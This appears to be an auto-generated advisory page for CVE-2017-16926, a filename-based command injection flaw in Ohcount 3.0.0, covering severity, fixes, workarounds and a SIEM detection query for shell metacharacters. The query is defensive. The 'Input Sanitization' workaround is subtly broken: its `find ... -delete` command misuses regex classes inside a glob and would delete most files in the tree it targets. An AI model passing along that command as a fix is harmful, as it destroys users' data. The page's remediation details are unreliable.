CVE-2017-16926 – CVE-2017-16926 is a command injection vulnerabi... (How to Fix)

Q: What is the severity of CVE-2017-16926?

CVE-2017-16926 has a CVSS score of 9.8 (CRITICAL). CVE-2017-16926 is a command injection vulnerability in Ohcount 3.0.0 that allows attackers to execute arbitrary code by providing specially crafted filenames containing shell metacharacters. This affects anyone running Ohcount 3.0.0 to process untrusted source trees, potentially leading to complete system compromise.

📋 TL;DR

CVE-2017-16926 is a command injection vulnerability in Ohcount 3.0.0 that allows attackers to execute arbitrary code by providing specially crafted filenames containing shell metacharacters. This affects anyone running Ohcount 3.0.0 to process untrusted source trees, potentially leading to complete system compromise.

💻 Affected Systems

Products:

Ohcount

Versions: 3.0.0

Operating Systems: Linux, Unix-like systems

Default Config Vulnerable: ⚠️ Yes

Notes: Vulnerable when processing untrusted source trees. Ohcount is often used in development tools, CI/CD pipelines, and code analysis systems.

📦 What is this software?

Ohcount by Ohcount Project

View all CVEs affecting Ohcount →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise with arbitrary code execution as the Ohcount user, potentially leading to privilege escalation, data theft, or complete system takeover.

🟠

Likely Case

Remote code execution leading to unauthorized access, data exfiltration, or installation of malware/backdoors on affected systems.

🟢

If Mitigated

Limited impact if Ohcount runs with minimal privileges, processes only trusted source trees, or is isolated in containers.

🌐 Internet-Facing: MEDIUM - Ohcount is typically used for code analysis and not directly internet-facing, but could be exposed via web interfaces or CI/CD pipelines.

🏢 Internal Only: HIGH - If used in development environments or CI/CD systems processing untrusted code, the risk is significant.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires providing malicious filenames to Ohcount. The vulnerability is well-documented in Debian bug reports.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Versions after 3.0.0

Vendor Advisory: https://bugs.debian.org/882372

Restart Required: No

Instructions:

1. Upgrade Ohcount to version 4.0.0 or later. 2. Update through package manager: 'sudo apt update && sudo apt upgrade ohcount' on Debian/Ubuntu systems. 3. Verify installation with 'ohcount --version'.

🔧 Temporary Workarounds

Input Sanitization

linux

Sanitize filenames before passing to Ohcount by removing shell metacharacters

find /path/to/source -name '*[!\w\d.-]*' -delete
rename 's/[^\w\d.-]//g' *

Container Isolation

linux

Run Ohcount in a container with limited privileges

docker run --rm -v $(pwd):/src alpine/ohcount:latest

🧯 If You Can't Patch

Run Ohcount with minimal privileges using a dedicated low-privilege user account
Only process trusted source trees and implement strict input validation for filenames

🔍 How to Verify

Check if Vulnerable:

Check Ohcount version: 'ohcount --version' should show 3.0.0. Also check if processing untrusted files.

Check Version:

ohcount --version

Verify Fix Applied:

Verify version is >3.0.0 with 'ohcount --version'. Test with safe input to confirm functionality.

📡 Detection & Monitoring

Log Indicators:

Unusual Ohcount process execution with shell metacharacters in arguments
Suspicious command execution following Ohcount runs

Network Indicators:

Unexpected outbound connections from Ohcount processes
Data exfiltration patterns

SIEM Query:

process_name:"ohcount" AND command_line:"*[;|&`$()]*"

📊 Metadata

CVE ID: CVE-2017-16926

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-78

Published: November 22, 2017

Last Updated: April 20, 2025

🔗 References

https://bugs.debian.org/882372 Exploit,Vendor Advisory
https://bugs.debian.org/882372 Exploit,Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2017-16926, you might also want to check these: